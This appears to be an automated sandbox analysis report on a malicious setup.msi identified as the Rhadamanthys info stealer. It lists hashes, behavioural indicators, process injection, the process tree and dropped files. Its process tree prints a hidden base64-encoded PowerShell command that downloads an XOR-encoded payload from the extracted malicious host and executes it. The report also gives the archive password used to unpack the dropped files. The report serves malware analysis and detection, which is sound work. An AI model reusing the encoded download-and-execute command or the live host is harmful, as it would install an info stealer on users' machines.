Analysis
-
max time kernel
90s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-06-2024 14:13
Static task
static1
Behavioral task
behavioral1
Sample
x64__installer___x32__.zip
Resource
win11-20240508-en
Behavioral task
behavioral2
Sample
__x64___setup___x32__.zip
Resource
win11-20240611-en
Behavioral task
behavioral3
Sample
setup.msi
Resource
win11-20240611-en
Behavioral task
behavioral4
Sample
password.jpg
Resource
win11-20240611-en
General
-
Target
setup.msi
-
Size
25.2MB
-
MD5
be2a13cfa57db16d3f654c5e444c360b
-
SHA1
7f45d2a4debbbca678cc5c300c59af01ca197bca
-
SHA256
b086cb6063a6fe194342b3dbe7639aebab02513305c95a914d052e87b54e0523
-
SHA512
978f4fb1e9df0785bbcd2734d4a7b32d3acab4a215075f0860ccc879bf65714e2c6eabba41ee7c38c0394a9a08b60757544034b21c336c2a3f233a411744953e
-
SSDEEP
786432:++aMGdE4CF4EgcHxa3pS58g0nfZ3AOnr:++aMGrCKEg+xwS5MGOr
Malware Config
Extracted
https://gotry-gotry.com/2306s1.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
explorer.exedescription pid process target process PID 4704 created 3008 4704 explorer.exe sihost.exe -
Blocklisted process makes network request 4 IoCs
Processes:
MsiExec.exepowershell.exeflow pid process 3 3028 MsiExec.exe 4 3028 MsiExec.exe 5 3028 MsiExec.exe 31 2300 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
steamerrorreporter64.exedescription pid process target process PID 5056 set thread context of 4704 5056 steamerrorreporter64.exe explorer.exe -
Drops file in Windows directory 20 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI770C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF04549351EC469D31.TMP msiexec.exe File created C:\Windows\Installer\e576f92.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI709E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI76FB.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI716C.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{CFA551BC-936D-4E76-9637-B181E28B5AC5} msiexec.exe File opened for modification C:\Windows\Installer\MSI8797.tmp msiexec.exe File created C:\Windows\Installer\e576f96.msi msiexec.exe File created C:\Windows\SystemTemp\~DF8C903233F94E7837.TMP msiexec.exe File opened for modification C:\Windows\Installer\e576f92.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6FE0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI70DE.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFBEFE6FCD43B74712.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFD4075232ECE440DB.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI705E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI70AF.tmp msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
UnRAR.exesteamerrorreporter64.exepid process 2220 UnRAR.exe 5056 steamerrorreporter64.exe -
Loads dropped DLL 10 IoCs
Processes:
MsiExec.exesteamerrorreporter64.exepid process 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 3028 MsiExec.exe 5056 steamerrorreporter64.exe 5056 steamerrorreporter64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4880 4704 WerFault.exe explorer.exe 1232 4704 WerFault.exe explorer.exe 3328 4704 WerFault.exe explorer.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
msiexec.exepowershell.exeexplorer.exeopenwith.exepid process 3420 msiexec.exe 3420 msiexec.exe 2300 powershell.exe 2300 powershell.exe 4704 explorer.exe 4704 explorer.exe 1404 openwith.exe 1404 openwith.exe 1404 openwith.exe 1404 openwith.exe 2300 powershell.exe 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exefirefox.exedescription pid process Token: SeShutdownPrivilege 2884 msiexec.exe Token: SeIncreaseQuotaPrivilege 2884 msiexec.exe Token: SeSecurityPrivilege 3420 msiexec.exe Token: SeCreateTokenPrivilege 2884 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2884 msiexec.exe Token: SeLockMemoryPrivilege 2884 msiexec.exe Token: SeIncreaseQuotaPrivilege 2884 msiexec.exe Token: SeMachineAccountPrivilege 2884 msiexec.exe Token: SeTcbPrivilege 2884 msiexec.exe Token: SeSecurityPrivilege 2884 msiexec.exe Token: SeTakeOwnershipPrivilege 2884 msiexec.exe Token: SeLoadDriverPrivilege 2884 msiexec.exe Token: SeSystemProfilePrivilege 2884 msiexec.exe Token: SeSystemtimePrivilege 2884 msiexec.exe Token: SeProfSingleProcessPrivilege 2884 msiexec.exe Token: SeIncBasePriorityPrivilege 2884 msiexec.exe Token: SeCreatePagefilePrivilege 2884 msiexec.exe Token: SeCreatePermanentPrivilege 2884 msiexec.exe Token: SeBackupPrivilege 2884 msiexec.exe Token: SeRestorePrivilege 2884 msiexec.exe Token: SeShutdownPrivilege 2884 msiexec.exe Token: SeDebugPrivilege 2884 msiexec.exe Token: SeAuditPrivilege 2884 msiexec.exe Token: SeSystemEnvironmentPrivilege 2884 msiexec.exe Token: SeChangeNotifyPrivilege 2884 msiexec.exe Token: SeRemoteShutdownPrivilege 2884 msiexec.exe Token: SeUndockPrivilege 2884 msiexec.exe Token: SeSyncAgentPrivilege 2884 msiexec.exe Token: SeEnableDelegationPrivilege 2884 msiexec.exe Token: SeManageVolumePrivilege 2884 msiexec.exe Token: SeImpersonatePrivilege 2884 msiexec.exe Token: SeCreateGlobalPrivilege 2884 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeDebugPrivilege 8 firefox.exe Token: SeDebugPrivilege 8 firefox.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe Token: SeRestorePrivilege 3420 msiexec.exe Token: SeTakeOwnershipPrivilege 3420 msiexec.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
msiexec.exefirefox.exepid process 2884 msiexec.exe 8 firefox.exe 8 firefox.exe 8 firefox.exe 8 firefox.exe 2884 msiexec.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
firefox.exepid process 8 firefox.exe 8 firefox.exe 8 firefox.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
firefox.exeMiniSearchHost.exepid process 8 firefox.exe 3572 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exefirefox.exefirefox.exedescription pid process target process PID 3420 wrote to memory of 3028 3420 msiexec.exe MsiExec.exe PID 3420 wrote to memory of 3028 3420 msiexec.exe MsiExec.exe PID 3420 wrote to memory of 3028 3420 msiexec.exe MsiExec.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 4680 wrote to memory of 8 4680 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1816 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe PID 8 wrote to memory of 1500 8 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 355252D9F557FDD8C39760E58BEA8BF72⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe"C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe explorer.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AZwBvAHQAcgB5AC0AZwBvAHQAcgB5AC4AYwBvAG0ALwAyADMAMAA2AHMAMQAuAGIAcwA2ADQAIgApADsAWwBCAHkAdABlAFsAXQBdACAAJAB4AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAcwAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACIAYgAiACkALgBSAGUAcABsAGEAYwBlACgAIgBAACIALAAiAGgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJAAiACwAIgBtACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACUAIgAsACIAcAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAiAHYAIgApACkAOwBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeAAuAEMAbwB1AG4AdAA7ACQAaQArACsAKQB7ACQAeABbACQAaQBdAD0AIAAoACQAeABbACQAaQBdACAALQBiAHgAbwByACAAMQA2ADcAKQAgAC0AYgB4AG8AcgAgADEAOAB9ADsAaQBlAHgAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHgAKQApAA==4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 18404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 20044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 18364⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.0.1499450250\1119165367" -parentBuildID 20230214051806 -prefsHandle 1712 -prefMapHandle 1724 -prefsLen 21996 -prefMapSize 235091 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d046ce0-8940-434e-8458-395dd99b7566} 8 "\\.\pipe\gecko-crash-server-pipe.8" 1816 1f598d2cb58 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.1.625758782\1037683223" -parentBuildID 20230214051806 -prefsHandle 2328 -prefMapHandle 2324 -prefsLen 22032 -prefMapSize 235091 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94e73726-ee68-4878-93fe-0ed0a07ede81} 8 "\\.\pipe\gecko-crash-server-pipe.8" 2340 1f584988458 socket3⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.2.1574037111\647923608" -childID 1 -isForBrowser -prefsHandle 2800 -prefMapHandle 2856 -prefsLen 22070 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {270e61cf-d902-4119-a4bb-8f5e335d5abc} 8 "\\.\pipe\gecko-crash-server-pipe.8" 2804 1f59ba0a858 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.3.2128743508\1273882628" -childID 2 -isForBrowser -prefsHandle 3476 -prefMapHandle 3460 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e51bb7f5-be33-449b-8968-b3c6c8cd7733} 8 "\\.\pipe\gecko-crash-server-pipe.8" 3580 1f59e603b58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.4.1160966184\1555315527" -childID 3 -isForBrowser -prefsHandle 5068 -prefMapHandle 5064 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1c31171-c228-4ca5-bb1a-69f9363a9276} 8 "\\.\pipe\gecko-crash-server-pipe.8" 4172 1f5a06c7a58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.5.204844938\1311730442" -childID 4 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e512fe5d-dfa9-4969-b73f-c9a14f93d82f} 8 "\\.\pipe\gecko-crash-server-pipe.8" 5200 1f5a06c7d58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8.6.46477761\13589618" -childID 5 -isForBrowser -prefsHandle 5404 -prefMapHandle 5412 -prefsLen 27536 -prefMapSize 235091 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a028ead-24d5-4812-8fd7-28a9a9d30575} 8 "\\.\pipe\gecko-crash-server-pipe.8" 5396 1f5a06c9558 tab3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4704 -ip 47041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4704 -ip 47041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4704 -ip 47041⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e576f95.rbsFilesize
22KB
MD5fb99f8a0435d05143a29817ab7ae69af
SHA10a601b995ae2b28a55164cedea392c9140c19fe7
SHA256af2e2c5d5cc915ea13633478b391759cbdef6a3b769531e9d5afb596c7a7b064
SHA51205db6ba85f3ee7b28e3b3dacc240f6af3a8b7cd7f601f15f251f1ddb7a6cc92d2ec0470ceca28fbb0dcb727c4a785b6b26edf480654ad5f691c4a6af7b3071a5
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\activity-stream.discovery_stream.json.tmpFilesize
30KB
MD5e9e5e3e2181273ad3736a31eaa02353a
SHA10830225a270f42d024a460db19807c0236a82498
SHA2566473024ceb0fa47a25c0c1b97cb3a6f9efa8fc1d859f73d506d71ecdf52e4e5e
SHA5122541a511b56358d3dcb9833c6e6db74fbaf3514898d66d851f9876754aed4804766b6b05738293747c9f6bd9542e55321974eef76663047c667efe81be2c0734
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jacuxifo.mvt.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs.jsFilesize
6KB
MD5a883224c555e18d2cc967e109707194a
SHA140c8d528e098bfc028e8d7420117f808052cf94b
SHA25691f9cf7db91adbc89099b2d754ff304402a80dc8c4b083d82d72a5c60409a6c4
SHA512c2827d81419fa97543d8cc892c9b3dbe2f11d31946f918559f8fa281039b57c0a1ffa301ee64e661c1869f7c2cf54503f7ae4656e2fe59bdf2238b67f2b34e10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs.jsFilesize
6KB
MD5d32201032334bcd2ab23a484a31d70c0
SHA1a7c2a5b4931af924174383e21c89b11a909f73ae
SHA256385e00cebe4fd40619780e50630aac4215bd2644f2fb4dc692d6b809722691ab
SHA512cd82daae200d45ebe4fbea1799dcd0345436affb302ca1afac7196fb5cbc59424ca56b90e07198a79d3ced036564da3de9f9b3513e3a69690394e84cbc2a09c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4Filesize
936B
MD5fe40dfa8c90a0fb8ca6ae8d897fc8e7f
SHA116ad6b87a782bf0bde3f17c36f113fa5b7974f98
SHA256a499583416f5946885905112cf21b7d9bbd1b470e378fd74d36ad7d53a0e2b3c
SHA512f8c5208073d1ebefb15b1686c800705904b7c1828806f4f0272fd070e10c02acd119f590a24354c3206bb9732def5596aabe910865398652b461650071ab426f
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exeFilesize
494KB
MD598ccd44353f7bc5bad1bc6ba9ae0cd68
SHA176a4e5bf8d298800c886d29f85ee629e7726052d
SHA256e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rarFilesize
378KB
MD535af121e2e55c85b99cb7daf396fb523
SHA1f2b073afafa04d96f0bc191e280ac3b658afb404
SHA256c64353f1e6327254ba4813d246e591f435a6f599bff9f8deb303557a73cd4257
SHA51224bbaa40c6c5c349dabb9c132fbf1113bc0d8116bf97229ad275d198ae05505699a9f33f9926d2147a6a036f849b928970f18aad6e8837c82f5dcc23cb28dcb0
-
C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exeFilesize
639KB
MD5fd3ce044ac234fdab3df9d7f492c470a
